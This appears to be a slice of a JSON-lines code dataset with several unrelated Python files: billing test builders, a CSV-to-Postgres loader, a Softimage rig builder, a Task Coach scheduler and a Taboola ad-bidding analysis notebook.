kwargs.pop('task', LogTariffTaskBuilder()).id\n self.b.consume_id = consume.id\n order = consume.order\n self.b.service_id = order.service_id\n self.b.service_order_id = order.service_order_id\n self.b.migration_order = kwargs.pop('migration_order', LogTariffMigrationOrderBuilder(order=order))\n self.b.tariff_dt = kwargs.pop('tariff_dt', datetime.datetime.now())\n self.b.qty = kwargs.pop('qty', 0)\n self.b.sum = kwargs.pop('sum', 0)\n self.b.consume_qty = kwargs.pop('consume_qty', 0)\n self.b.consume_sum = kwargs.pop('consume_sum', 0)\n super(LogTariffMigrationConsumeBuilder, self).prepare(**kwargs)\n\n\nclass DailyActRequestBuilder(ObjectBuilder):\n _class = mapper.DailyActRequest\n\n\nclass ContractPrintFormRuleBuilder(ObjectBuilder):\n _class = mapper.ContractPrintFormRules\n\n\nclass FPSBankBuilder(ObjectBuilder):\n _class = mapper.FPSBank\n\n\nclass IsoCurrencyRateBuilder(ObjectBuilder):\n _class = mapper.IsoCurrencyRate\n\n def prepare(self, **kwargs):\n self.b.id = kwargs.pop('rate_id')\n self.b.src_cc = kwargs.pop('src_cc')\n self.b.dt = kwargs.pop('dt')\n self.b.iso_currency_from = kwargs.pop('iso_currency_from')\n self.b.rate_from = kwargs.pop('rate_from')\n self.b.iso_currency_to = kwargs.pop('iso_currency_to')\n self.b.rate_to = kwargs.pop('rate_to')\n super(IsoCurrencyRateBuilder, self).prepare(**kwargs)\n\n\nclass ReconciliationRequestBuilder(ObjectBuilder):\n _class = mapper.ReconciliationRequest\n\n def prepare(self, **kwargs):\n now = datetime.datetime.now()\n self.b.external_id = kwargs.pop('external_id', 'super-reconciliation-id-%s' % get_big_number())\n self.b.dt_from = ut.trunc_date(now - datetime.timedelta(days=30))\n self.b.dt_to = ut.trunc_date(now)\n self.b.dt = now\n self.b.status = 'NEW'\n super(ReconciliationRequestBuilder, self).prepare(**kwargs)\n\n def build(self, session):\n if self.b.get('client') is None:\n self.b.client = ClientBuilder.construct(session)\n\n if self.b.get('person') is None:\n self.b.person = PersonBuilder.construct(session, client=self.b.client, type='ur')\n\n if (self.b.get('firm') or 
self.b.get('firm_id')) is None:\n firm = FirmBuilder.construct(session)\n oebs_org_id = get_big_number()\n session.execute(\n '''insert into bo.t_firm_export (firm_id, export_type, oebs_org_id) values (:firm_id, 'OEBS', :oebs_org_id)''',\n {'firm_id': firm.id, 'oebs_org_id': oebs_org_id},\n )\n self.b.firm = firm\n\n return super(ReconciliationRequestBuilder, self).build(session)\n\n\nclass NirvanaTaskTypeBuilder(ObjectBuilder):\n _class = mapper.NirvanaTaskType\n\n def prepare(self, **kwargs):\n self.b.id = kwargs.pop('id', generate_character_string())\n super(NirvanaTaskTypeBuilder, self).prepare(**kwargs)\n\n\nclass NirvanaTaskBuilder(ObjectBuilder):\n _class = mapper.NirvanaTask\n\n def prepare(self, **kwargs):\n self.b.task_type = kwargs.pop('task_type', NirvanaTaskTypeBuilder())\n self.b.metadata = kwargs.pop('metadata', None)\n self.b.state = NirvanaProcessingTaskState.NEW\n super(NirvanaTaskBuilder, self).prepare(**kwargs)\n\n\nclass NirvanaTaskItemBuilder(ObjectBuilder):\n _class = mapper.NirvanaTaskItem\n\n def prepare(self, **kwargs):\n self.b.task = kwargs.pop('task', NirvanaTaskBuilder())\n self.b.metadata = kwargs.pop('metadata', None)\n self.b.output = kwargs.pop('output', None)\n self.b.processed = 0\n super(NirvanaTaskItemBuilder, self).prepare(**kwargs)\n\n\ndef create_brand(session, dt2clients, finish_dt=None, brand_type=7):\n from_dt, clients = dt2clients[0]\n main_client = next(iter(clients))\n contract = ContractBuilder(\n client=main_client,\n person=None,\n commission=ContractTypeId.ADVERTISING_BRAND,\n firm=FirmId.YANDEX_OOO,\n dt=ut.trunc_date(from_dt),\n payment_type=None,\n brand_type=brand_type,\n brand_clients={cl.id: 1 for cl in clients}\n ).build(session).obj\n\n col_type = mapper.contract_meta.collateral_types['GENERAL'][1026]\n col = contract.col0\n for from_dt, clients in dt2clients[1:]:\n col = contract.append_collateral(\n ut.trunc_date(from_dt),\n col_type,\n is_signed=from_dt,\n brand_clients={cl.id: 1 for cl in clients}\n )\n col.finish_dt = finish_dt and ut.trunc_date(finish_dt)\n session.flush()\n\n return contract\n\n\ndef add_dynamic_discount(consume, dynamic_discount_pct):\n consume.consume_qty = ut.round(ut.radd_percent(consume.consume_qty, -dynamic_discount_pct), 6)\n delta_qty = ut.round(ut.radd_percent(consume.current_qty, -dynamic_discount_pct), 6) - consume.current_qty\n consume.current_qty += delta_qty\n consume.order.consume_qty += delta_qty\n consume.order.dynamic_bonus_qty = delta_qty\n\n consume.completion_sum = ut.round00(ut.add_percent(consume.completion_qty * 30, -dynamic_discount_pct))\n consume.discount_pct = ut.round00(ut.mul_discounts(consume.discount_pct, dynamic_discount_pct))\n consume.session.flush()\n\n\n@contextlib.contextmanager\ndef patched_currency(dts_rates):\n def _extract_dt_rate(dt_rates):\n if isinstance(dt_rates, (list, tuple)):\n from_dt, rates = dt_rates\n else:\n from_dt = datetime.datetime(1980, 1, 1)\n rates = dt_rates\n return from_dt, rates\n\n def _patched(session, iso_cc, dat, *args, **kwargs):\n prev_dt, prev_rates = _extract_dt_rate(dts_rates[0])\n for dt_rates in dts_rates[1:] + [(datetime.datetime(3000, 1, 1), {})]:\n cur_dt, rates = _extract_dt_rate(dt_rates)\n if prev_dt <= dat < cur_dt:\n return ut.Struct(rate=prev_rates[iso_cc])\n else:\n prev_dt, prev_rates = cur_dt, rates\n\n patcher_real = mock.patch(\n 'balance.mapper.common.CurrencyRate.get_real_currency_rate_by_date',\n staticmethod(_patched)\n )\n patcher = mock.patch(\n 'balance.mapper.common.CurrencyRate.get_currency_rate_by_date',\n 
staticmethod(_patched)\n )\n with patcher, patcher_real:\n yield\n\n\nclass NDSOperationCodeBuilder(ObjectBuilder):\n _class = mapper.NDSOperationCode\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"billing/tests/object_builder.py","file_name":"object_builder.py","file_ext":"py","file_size_in_byte":84685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"37109026777","text":"import glob\nfrom dotenv import load_dotenv\nimport os\nimport pandas as pd\nfrom sqlalchemy import create_engine\n\nload_dotenv()\n\n\nengine = create_engine(f\"postgresql://{os.getenv('DB_STRING')}\")\n\nengine.execute(\"\"\"\n CREATE SCHEMA IF NOT EXISTS ecommerce\n \"\"\")\n\nfilenames = glob.glob('*.csv')\nfor filename in filenames:\n dataset_name = filename.split('_dataset')[0]\n dataset = pd.read_csv(filename)\n dataset.to_sql(\n name=dataset_name, con=engine, schema=\"ecommerce\", if_exists=\"replace\"\n )\n print(f'SUCCEED: {filename} -> {dataset_name}')","repo_name":"mebaysan/Modern-Data-Architecture","sub_path":"Source/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"3"} +{"seq_id":"1585053559","text":"from cmivfx import xsi, log\r\nfrom datetime import datetime\r\n\r\n\r\nclass BuilderHooks(object):\r\n\r\n \"\"\"\r\n Builder takes guide model and creates a 'rig' model from the parameters specified in the guide.\r\n Rig model contains all rig elements - components, groups, geometry etc.\r\n Builder needs to be instantiated with instance of guide module.\r\n \"\"\"\r\n\r\n def __init__(self, guide):\r\n self.guide = guide\r\n self.settings = self.guide.settings\r\n self.components = {} # dictionary of components to be built\r\n\r\n def build(self):\r\n \"\"\"Master call for building rig elements. 
Logs completion time for convenience.\"\"\"\r\n startTime = datetime.now()\r\n\r\n xsi.SetValue('preferences.scripting.cmdlog', False, '')\r\n self.buildInitialHierarchy()\r\n self.initComponents()\r\n self.buildComponents()\r\n xsi.SetValue('preferences.scripting.cmdlog', True, '')\r\n\r\n endTime = datetime.now()\r\n log('Build completed in: {}'.format(endTime - startTime))\r\n\r\n def buildInitialHierarchy(self):\r\n \"\"\"Creates default rig model hierarchy for organising rig components.\"\"\"\r\n # Rig model (different from guide model)\r\n self.model = xsi.ActiveSceneRoot.AddModel(None, self.settings['Name'])\r\n self.model.Properties('Visibility').Parameters('viewvis').Value = False\r\n\r\n # Groups for organisation\r\n self.hiddenGrp = self.model.AddGroup(None, 'hidden_grp')\r\n self.unselectableGrp = self.model.AddGroup(None, 'unselectable_grp')\r\n self.controllersGrp = self.model.AddGroup(None, 'controllers_grp')\r\n self.deformersGrp = self.model.AddGroup(None, 'deformers_grp')\r\n\r\n self.hiddenGrp.Parameters('viewvis').Value = 0\r\n self.unselectableGrp.Parameters('selectability').Value = 0\r\n self.deformersGrp.Parameters('viewvis').Value = 0\r\n\r\n # Nulls for organisation\r\n self.deformersOrg = self.model.AddNull('deformers_org')\r\n self.geometryOrg = self.model.AddNull('geometry_org')\r\n self.hiddenGrp.AddMember(self.deformersOrg)\r\n self.hiddenGrp.AddMember(self.geometryOrg)\r\n\r\n def initComponents(self):\r\n \"\"\"\r\n For each component collected by the guide, store the component build class in a dictionary.\r\n \"\"\"\r\n for key, guide in self.guide.components.items():\r\n type_ = guide.type_ # e.g. arm, godnode\r\n log(\"init component builder: '{}'. Component type is '{}'\".format(key, type_))\r\n\r\n moduleName = type_.lower()\r\n module = __import__('cmivfx.components.{}'.format(moduleName), globals(), locals(), ['object'], -1)\r\n ComponentClass = getattr(module, type_) # e.g. 
cmivfx.components.fkctrl.FkCtrl\r\n\r\n self.components[key] = ComponentClass(self, guide)\r\n\r\n def buildComponents(self):\r\n \"\"\"\r\n Execute each hook for each component in succession - createObjects() for all components,\r\n then createParameters() for all components etc.\r\n \"\"\"\r\n for i in range(5):\r\n for key, component in self.components.items():\r\n component.build[i]()\r\n\r\n","repo_name":"lachyb/softimagePythonRigging","sub_path":"pythonLib/cmivfx/builder/builderHooks.py","file_name":"builderHooks.py","file_ext":"py","file_size_in_byte":3159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"18747116454","text":"from taskcoachlib import patterns\nfrom taskcoachlib.thirdparty import apscheduler\nimport dateandtime\nimport logging\nimport timedelta\nimport wx\nimport weakref\n\n\nclass ScheduledMethod(object):\n def __init__(self, method):\n self.__func = method.im_func\n self.__self = weakref.ref(method.im_self)\n\n def __eq__(self, other):\n return self.__func is other.__func and self.__self() is other.__self()\n\n def __hash__(self):\n return hash(self.__dict__['_ScheduledMethod__func'])\n\n def __call__(self, *args, **kwargs):\n obj = self.__self()\n if obj is None:\n try:\n Scheduler().unschedule(self)\n except KeyError:\n pass\n else:\n self.__func(obj, *args, **kwargs)\n\n\nclass Scheduler(apscheduler.scheduler.Scheduler):\n __metaclass__ = patterns.Singleton\n \n def __init__(self, *args, **kwargs):\n self.__handler = self.createLogHandler()\n super(Scheduler, self).__init__(*args, **kwargs)\n self.__jobs = {}\n self.start()\n \n def createLogHandler(self):\n # apscheduler logs, but doesn't provide a default handler itself, make it happy:\n schedulerLogger = logging.getLogger('taskcoachlib.thirdparty.apscheduler.scheduler')\n try:\n handler = logging.NullHandler()\n except AttributeError:\n # NullHandler is new in Python 2.7, log to stderr if not available\n handler = logging.StreamHandler()\n schedulerLogger.addHandler(handler)\n return handler\n\n def removeLogHandler(self):\n # accumulation of handlers in the unit/language/etc tests makes them *slow*\n schedulerLogger = logging.getLogger('taskcoachlib.thirdparty.apscheduler.scheduler')\n schedulerLogger.removeHandler(self.__handler)\n\n def shutdown(self, wait=True, shutdown_threadpool=True):\n super(Scheduler, self).shutdown(wait=wait, \n shutdown_threadpool=shutdown_threadpool)\n self.removeLogHandler()\n\n def schedule(self, function, dateTime):\n proxy = ScheduledMethod(function)\n def callback():\n if proxy in self.__jobs:\n del self.__jobs[proxy]\n wx.CallAfter(proxy)\n\n if dateTime <= dateandtime.Now() + timedelta.TimeDelta(milliseconds=500):\n callback()\n else:\n self.__jobs[proxy] = job = self.add_date_job(callback, dateTime, misfire_grace_time=0)\n return job\n\n def schedule_interval(self, function, days=0, minutes=0, seconds=0):\n proxy = ScheduledMethod(function)\n def callback():\n wx.CallAfter(proxy)\n \n if proxy not in self.__jobs:\n start_date = dateandtime.Now().endOfDay() if days > 0 else None\n self.__jobs[proxy] = job = self.add_interval_job(callback, days=days, \n minutes=minutes, seconds=seconds, start_date=start_date, misfire_grace_time=0,\n coalesce=True)\n return job\n\n def unschedule(self, function):\n proxy = function if isinstance(function, ScheduledMethod) else ScheduledMethod(function)\n if proxy in self.__jobs:\n try:\n self.unschedule_job(self.__jobs[proxy])\n except KeyError:\n pass\n del self.__jobs[proxy]\n\n 
def is_scheduled(self, function):\n return ScheduledMethod(function) in self.__jobs\n","repo_name":"TaskEvolution/Task-Coach-Evolution","sub_path":"taskcoach/taskcoachlib/domain/date/scheduler.py","file_name":"scheduler.py","file_ext":"py","file_size_in_byte":3465,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"3"} +{"seq_id":"21490294977","text":"#%%\nfrom utils.env import load_env_from_aws\nload_env_from_aws()\n\nimport importlib\nimport datetime\nimport itertools\nimport collections\nimport pprint\nimport sys\nimport re\nimport os\n\nfrom matplotlib import pyplot as plt\nimport pandas as pd\nimport numpy as np\nfrom IPython.display import display as ipydisp\n\nfrom notebooks.aduriseti_shared.utils import *\nfrom models.utils import wavg, get_wavg_by, wstd\n\nfrom models.taboola.common import *\nfrom models.taboola.utils import *\n\nstart_date = TODAY - 90*DAY\neval_date = TODAY - 30*DAY\nend_date = TODAY\n\nsplit_cols = [\"state\", \"device\", \"keyword\"]\nrps_df = agg_rps(start_date, end_date, None, traffic_source=TABOOLA,\n agg_columns=tuple([\"campaign_id\", *split_cols, \"utc_dt\"]))\nrps_df = translate_taboola_vals(rps_df)\nrps_df = rps_df_postprocess(rps_df)\nrps_df_bkp = rps_df.copy()\n#%%\nrps_df = rps_df_bkp.copy()\nrps_df = rps_df.reset_index()\nfitI = rps_df['utc_dt'].dt.date < eval_date\nfitI.index = rps_df.index\n\nimport models.taboola.utils\nimportlib.reload(models.taboola.utils)\n# TaboolaRPSEst = models.taboola.utils.TaboolaRPSEst\nclusterer = TaboolaRPSEst(clusts=None,enc_min_cnt=10).fit(\n rps_df[fitI].set_index([*split_cols, \"utc_dt\"]), None)\nrps_df.loc[fitI, \"clust\"] = clusterer.transform(\n rps_df[fitI].set_index([*split_cols, \"utc_dt\"]))\nrps_df.loc[~fitI, \"clust\"] = clusterer.transform(\n rps_df[~fitI].set_index([*split_cols, \"utc_dt\"]))\nrps_df[\"clust\"] = rps_df[\"clust\"].fillna(-1)\n\n#%%\nself = clusterer\nX = rps_df.set_index([*split_cols, \"utc_dt\"])\nXdf = X\nassert X.index.names[-1] == \"utc_dt\"\nX = X .reset_index()[X.index.names].iloc[:, :-1]\nX = self.enc_1hot.transform(X)\nprint(\"|X|\", X.shape)\nP = clusterer.clf.decision_path(X)\n#%%\nPdf = pd.DataFrame(P.todense(),index=Xdf.index)\nrevenue_Pdf = Pdf * Xdf[[\"revenue\"]].values\nsession_Pdf = Pdf * Xdf[[\"sessions\"]].values\nleads_Pdf = Pdf * Xdf[[\"leads\"]].values.astype(int)\nrevenue_agg_Pdf = Pdf * revenue_Pdf.groupby(\"utc_dt\").transform(sum)\nsession_agg_Pdf = Pdf * session_Pdf.groupby(\"utc_dt\").transform(sum)\nleads_agg_Pdf = Pdf * leads_Pdf.groupby(\"utc_dt\").transform(sum)\n\nSAMPLE_THRESH = 100\nI = (~(session_agg_Pdf < SAMPLE_THRESH)).iloc[:,::-1].idxmax(axis=1)\nI = np.eye(self.clf.tree_.node_count).astype(bool)[I]\n\nrev_rollup = (revenue_agg_Pdf * I).sum(axis=1)\nsess_rollup = (session_agg_Pdf * I).sum(axis=1)\nrps_rollup = rev_rollup / sess_rollup\nrps_rollup\n#%%\nrev_rollup\n#%%\nsess_rollup\n#%%\ndef running_suffix_max(df):\n df_running_max = df.copy()\n H, W = df_running_max.shape\n for ci in reversed(range(W-1)):\n df_running_max.iloc[:, ci] = np.maximum(\n df_running_max.iloc[:, ci], df_running_max.iloc[:, ci+1])\n return df_running_max\n\nrevenue_contrib_Pdf = revenue_agg_Pdf - running_suffix_max(revenue_agg_Pdf).shift(-1,axis=1).fillna(0)\nsession_contrib_Pdf = session_agg_Pdf - running_suffix_max(session_agg_Pdf).shift(-1,axis=1).fillna(0)\nleads_contrib_Pdf = leads_agg_Pdf - running_suffix_max(leads_agg_Pdf).shift(-1,axis=1).fillna(0)\nrevenue_contrib_Pdf = 
np.maximum(0,revenue_contrib_Pdf)\nsession_contrib_Pdf = np.maximum(0,session_contrib_Pdf)\nleads_contrib_Pdf = np.maximum(0,leads_contrib_Pdf)\n\n\"\"\"\ntotal_sess = 0\ntotal_rev = 0\nwhile total_sess < THRESH - scan up through decision tree path:\n rollup_factor = min(n.sessions,THRESH - total_sess) / n.sessions\n total_sess += n.sessions * rollup_factor\n total_rev += n.rev * rollup_factor\nROAS = total_rev / total_sess\n\"\"\"\nH,W = session_contrib_Pdf.shape\ntotal_sess = session_contrib_Pdf.iloc[:,-1]\ntotal_rev = revenue_contrib_Pdf.iloc[:,-1]\nimport tqdm\nfor ni in tqdm.tqdm(reversed(session_contrib_Pdf.columns[:-1])):\n n_sessions = session_contrib_Pdf.iloc[:, ni]\n n_revenue = revenue_contrib_Pdf.iloc[:,ni]\n rollup_factor = np.clip((SAMPLE_THRESH - total_sess) / n_sessions, 0, 1).fillna(0)\n total_sess += n_sessions * rollup_factor\n total_rev += n_revenue * rollup_factor \n\nXdf[\"rps_rollup\"] = total_rev / total_sess\nXdf[\"rps_rollup\"]\n#%%\ntotal_sess\n#%%\ntotal_rev\n#%%\ntotal_rev / total_sess\n#%%\n\"\"\"\nNOTE: dont actually think this owrks\nbest_path (n,):\n if n == NULL:\n return INF,NAN\n if n.date < lookback start:\n return INF,NAN\n else\n OPTS = [\n 1. rollup over time\n best_path_time_rollup = best_path(n-7*DAY)\n => MSE(*best_path_time_rollup,n)\n ->\n RPS(*best_path_time_rollup,n)\n 2. rollup over tree\n best_path_tree_rollup = best_path(n-7*DAY)\n => MSE(*best_path_tree_rollup,n)\n ->\n RPS(*best_path_tree_rollup,n)\n \n return total_rev + n.sessopn\n\"\"\"\n\"\"\"\nmetaparams = time decay \\alpha - heirarchy decay \\beta\nDP rollup:\n- define recursion as fn of:\n - node\n - date\n - sessions rolled up \n- IF sessions > SESS_THRESH: \n return [{\n sessions = 0\n revenue = 0\n }]\n- IF node == NULL\n return MSE == INF \n- IF date < lookback period\n return MSE == INF\n- ELSE:\n 1: try DP rollup at node parent `p` \n rollup1 = [* \\beta * DP_rollup(`p`,date,sessions+n.session),\n {sessions = n.sessions, revenue = n.revenue}]\n 2: for every node `m` in decision path downstream of `n` try rollup at `m` - 7*DAY\n rollup2_seq = [\n [ * \\alpha**7 * DP_rollup(`m`,date-7*DAY,sessions+n.sessions)\n {sessions = n.sessions, revenue = n.revenue}]\n for m in decision path\n ]\n return MIN([rollup1,*rollup2_seq], by = lambda rollup: MSE(rollup))\n\nbest_rollup = DP_rollup(decisoin path leaf `l`, TODAY, 0)\nRPS = sum(best_rollup.revenue) / sum(best_rollup.sessions)\n\"\"\"\n\"\"\"\n. . . . . . . \n\n. . . . . . .\n\n. . . . . . V\n\n. . . . . . < V\n ^ ^\n. . . . . 
V V\n\n\nBFS(ish) btd\n- 1 condition - we will not add a node to Q unless both its children have\n been visited - this is to maintain a \"staircase\" exploration pattern\nV = {}\nQ = [leaf] # \nwhile Q and TOTAL_SESS(V) < THRESH\n n = pop minimum n from Q by MSE(*V,n)\n V += n\n fringe = [n.parent for n in V] + [n-7*day for n in V] \n + bottom border + right border\n fringe -= V\n fringe = filter(fringe,n in fringe twice)\n fringe = fringe - Q\n Q += fringe\n\nreturn RPC(V)\n\n\"\"\"\n#%%\nleaf_indices = clusterer.clf.apply(X)\nDRC = [(1,r,li) for r,li in enumerate(leaf_indices)]\nD,R,C = zip(*DRC)\nimport scipy.sparse\nL = scipy.sparse.csr_matrix((D,(R,C)))\n#%%\nLdf = pd.DataFrame(L.todense(),index=Xdf.index).astype(int)\nrevenue_Ldf = Ldf * Xdf[[\"revenue\"]].values\nsession_Ldf = Ldf * Xdf[[\"sessions\"]].values\nleads_Ldf = Ldf * Xdf[[\"leads\"]].values.astype(int)\n#%%\nrevenue_Pdf.groupby(\"utc_dt\")\n#%%\nself.clf.tree_.children_left\n#%%\nself.clf.tree_.children_right\n#%%\nPdf\n#%%\nPdf * session_Pdf.groupby(\"utc_dt\").sum()\n\n#%%\nCRD_l = [(n,l,1) for n,l in enumerate(self.clf.tree_.children_left) if l > 0]\nCRD_r = [(n,r,1) for n,r in enumerate(self.clf.tree_.children_right) if r >= 0]\nC,R,D = zip(*[*CRD_l,*CRD_r])\nlen(C),len(R),len(D)\n\nimport scipy.sparse\n\nA_child = scipy.sparse.csr_matrix((D,(R,C))).todense()\nA_child\n# A_parent = scipy.sparse.csr_matrix()\n#%%\nrps_df[\"rps_clust\"] = rps_df \\\n .groupby([\"clust\", \"utc_dt\"])[\"rps\"].transform(get_wavg_by(rps_df, \"sessions\"))\ndaily_rps_mae = (rps_df[\"rps\"] - rps_df[\"rps_clust\"]).abs()\nassert abs(\n wavg(rps_df[\"rps_clust\"], rps_df[\"sessions\"]) -\n wavg(rps_df[\"rps\"], rps_df[\"sessions\"])) < 1e-10\n\nkpis_agg = [\"revenue\", \"sessions\", \"leads\"]\nkpis_session = [\"rps\", \"lps\"]\nkpis_lead = [\"rpl\"]\nclust_rps_df = rps_df[~fitI].groupby(\"clust\")[kpis_agg].sum()\nclust_rps_df[kpis_session] = rps_df[~fitI].groupby(\"clust\") \\\n .apply(lambda df: wavg(df[kpis_session], df['sessions']))\nclust_rps_df[kpis_lead] = rps_df[~fitI].groupby(\"clust\") \\\n .apply(lambda df: wavg(df[kpis_lead].fillna(0).values, df['leads']))\n# clust_rps_df[split_cols]\nclust_rps_df[\"rps_\"] = clust_rps_df[\"revenue\"] / clust_rps_df[\"sessions\"]\nclust_rps_df[\"rpl_\"] = clust_rps_df[\"revenue\"] / clust_rps_df['leads']\n# agg_rps_df = rps_df[~fitI].groupby(rps_df.index.names[:-1]).agg({\n# \"sessions\": sum,\n# \"rps\": get_wavg_by(rps_df[~fitI],\"sessions\")\n# })\nipydisp(clust_rps_df)\n# assert clust_rps_df[\"rps\"].max() <= agg_rps_df[\"rps\"].max()\n# rps_wavg = wavg(agg_rps_df[[\"rps\"]], agg_rps_df[\"sessions\"])\nrps_wavg = wavg(rps_df[~fitI][\"rps\"], rps_df[~fitI][\"sessions\"])\nrps_clust_wavg = wavg(clust_rps_df[[\"rps\"]], clust_rps_df[\"sessions\"])\nassert all((rps_wavg - rps_clust_wavg).abs()\n < 1e-3), (rps_wavg, rps_clust_wavg)\n\nperfd = {\n \"clusterer\": clusterer,\n # \"fit_shape\": agg_rps_df.shape,\n \"clust_shape\": clust_rps_df.shape,\n # \"split_variance\": wstd(agg_rps_df[\"rps\"], agg_rps_df[\"sessions\"]),\n \"cluster_variance\": wstd(clust_rps_df[\"rps\"], clust_rps_df[\"sessions\"]),\n # wstd(rps_df[\"rps_avg\"],rps_df[\"sessions\"])\n # \"clustered_split_factor\": get_split_factor(rps_df),\n \"rps_mae\": wavg(daily_rps_mae, rps_df[\"sessions\"]),\n}\npprint.pprint(perfd)\n#%%\nrps_df[\"rps_est\"] = clusterer.predict(rps_df.set_index([*split_cols,\"utc_dt\"]))\n\nrps_df_campaign = rps_df[rps_df[\"utc_dt\"].dt.date > TODAY - 7*DAY] \\\n .groupby([\"campaign_id\"])[[\"rps_est\"]] 
\\\n .agg(get_wavg_by(rps_df, \"sessions\"))\nrps_df_publisher = rps_df \\\n [rps_df[\"utc_dt\"].dt.date > TODAY - 7*DAY] \\\n .groupby([\"campaign_id\",\"keyword\"])[[\"rps_est\"]] \\\n .agg(get_wavg_by(rps_df, \"sessions\")) \\\n .unstack()\n#%%\nfrom pytaboola import TaboolaClient\nfrom pytaboola.services import AccountService,CampaignService,CampaignSummaryReport\n# d = CampaignSummaryReport(client, O65_ACCNT_ID).fetch(\n# dimension=\"campaign_day_breakdown\",start_date=TODAY-7*DAY, end_date=TODAY)\n# import jmespath\n# jmespath.search(\"results[?cpc > `0`].{cpc: cpc,campaign_id: campaign, utc_dt: date}\",d)\n\nclient = TaboolaClient(**TABOOLA_HC_CREDS)\nacct_service = AccountService(client)\naccnts = acct_service.list()[\"results\"]\nid2accnt = {a[\"account_id\"]: a for a in accnts}\n\ncamps = []\nfor aid in [TEST_ACCNT_ID,O65_ACCNT_ID]:\n camp_service = CampaignService(client, aid)\n camps += camp_service.list()\n\ncampdf = pd.DataFrame([flatten_camp(camp) for camp in camps])\ncampdf = campdf.set_index((\"attrs\", \"id\"))\ncampdf.columns = pd.MultiIndex.from_tuples(campdf.columns)\nprint(\"|campdf|\", campdf.shape)\n\nprint(\"campaign df sparsity:\",((campdf == 0) | campdf.isna()).sum().sum() / np.prod(campdf.shape))\nstrC = campdf.dtypes[campdf.dtypes == object].index\nfloatC = campdf.dtypes[campdf.dtypes == np.float64].index\n\n# campdf = campdf.reindex({*campdf.index,*active_camps})\nactive_camps = {*active_camps} & {*campdf.index}\nactive_camps\n#%%\ncpc_df_campaign_new = np.clip(\n rps_df_campaign[\"rps_est\"].reindex(active_camps) / ROI_TARGET,\n (1-MAX_CUT)*campdf[\"attrs\"].loc[active_camps,\"cpc\"],\n (1+MAX_PUSH)*campdf[\"attrs\"].loc[active_camps,\"cpc\"])\ncpc_df_campaign_new = cpc_df_campaign_new \\\n .combine_first(campdf[\"attrs\"].loc[active_camps,\"cpc\"])\n\nimport requests\nresp = requests.get(\n f\"{TABOOLA_BASE}/{O65_ACCNT_ID}/allowed-publishers/\",\n headers=client.authorization_header)\ntaboola_publishers = jmespath.search('results[].account_id', resp.json())\n\nbid_mod_df = campdf[\"publisher_bid_modifier\"] \\\n .reindex(active_camps) \\\n .T.reindex(taboola_publishers).T\ncpc_df_publisher = bid_mod_df.fillna(1) * \\\n campdf[\"attrs\"].loc[active_camps, [\"cpc\"]].values\ncpc_df_publisher_new = np.clip(\n rps_df_publisher[\"rps_est\"] \\\n .reindex(active_camps) \\\n .T.reindex(taboola_publishers).T / ROI_TARGET,\n (1-MAX_CUT)*cpc_df_publisher,\n (1+MAX_PUSH)*cpc_df_publisher,)\nbid_mod_df_new = cpc_df_publisher_new / cpc_df_campaign_new.values.reshape(-1,1)\napprox1 = (bid_mod_df_new - 1).abs() < 1e-2\nbid_mod_df_new = bid_mod_df_new.loc[:,~(bid_mod_df_new.isna() | approx1).all(axis=0)]\nbid_mod_df_new = bid_mod_df_new \\\n .combine_first(bid_mod_df.loc[:,~bid_mod_df.isna().any()])\n#%%\ncampdf.loc[active_camps,(\"updates\",\"cpc\")] = cpc_df_campaign_new.round(2)\ncampdf.loc[active_camps,(\"updates\",\"publisher_bid_modifier\")] = \\\n bid_mod_df_new.round(2).apply(\n lambda r: {\n \"values\": [{'target': c, \"bid_modification\": v} for c,v in r[~r.isna()].items()]\n },\n axis=1)\ncampdf[\"updates\"] = campdf[\"updates\"].where(\n pd.notnull(campdf[\"updates\"]), None)\nupdatedf = pd.concat((\n campdf.loc[active_camps,\"attrs\"][\"advertiser_id\"],\n campdf.loc[active_camps,\"updates\"].apply(dict,axis=1).apply(json.dumps),\n),axis=1) \\\n .reset_index()\nupdatedf.columns = [\"campaign_id\",\"account_id\",\"update\"]\nupdatedf[\"date\"] = TODAY\nupdatedf[\"datetime\"] = NOW\n\nupload_taboola_updates_to_redshift(updatedf)\n#%%\nsql = f\"\"\"\n SELECT \n 
*\n FROM (\n SELECT \n *,\n ROW_NUMBER() OVER (\n PARTITION BY account_id,campaign_id,schedule\n ORDER BY datetime DESC\n ) as rn\n FROM \n {DS_SCHEMA}.{TABOOLA_CAMPAIGN_UPDATE_TABLE}\n )\n WHERE \n rn = 1\n ;\n\"\"\"\nwith HealthcareDW() as db:\n updatedf = db.to_df(sql)\nupdatedf['update'] = updatedf['update'].apply(json.loads)\n#%%\nfor _,r in updatedf.iterrows():\n client = TaboolaClient(**TABOOLA_HC_CREDS)\n camp_service = CampaignService(client, r[\"account_id\"])\n camp_service.update(r[\"campaign_id\"],**r[\"update\"])\n#%%\ncampdf.loc[active_camps]\n#%%\nsql = f\"\"\"\nselect d.query, substring(d.filename,14,20), \nd.line_number as line, \nsubstring(d.value,1,16) as value,\nsubstring(le.err_reason,1,48) as err_reason\nfrom stl_loaderror_detail d, stl_load_errors le\nwhere d.query = le.query\nand d.query = pg_last_copy_id(); \n\"\"\"\nsql = f\"\"\"\nselect *\nfrom stl_load_errors\norder by starttime desc\nlimit 100 \n\"\"\"\nwith HealthcareDW() as db:\n df = db.to_df(sql)\ndf\n#%%\ndf.iloc[0,-1]\n#%%\ndf.iloc[0, -3]\n#%%\n\nrps_df = rps_df.join(campdf[\"attrs\"][[\"cpc\",\"is_active\"]],on=\"campaign_id\",rsuffix=\"_\")\nrps_df = rps_df.loc[:,~rps_df.columns.duplicated()]\nrps_df[\"cost\"] = rps_df[\"cpc\"] * rps_df[\"sessions\"]\ndf = rps_df \\\n [rps_df[\"is_active\"].fillna(False)] \\\n .groupby([\"utc_dt\",\"campaign_id\"])\\\n [[\"revenue\",\"cost\"]].sum().unstack()\n(df[\"revenue\"]/df[\"cost\"]).plot()\n#%%\n#%%\ncampdf[\"publisher_bid_modifier\"]\ns1 = df[\"rps_est\"].unstack().columns\ns2 = campdf[\"publisher_bid_modifier\"].columns\ns1 = {*s1}; s2 = {*s2}\nlen(s1-s2),len(s2-s1),len(s1&s2)\n#%%\n{f[3:] for f in clusterer.enc_features} - 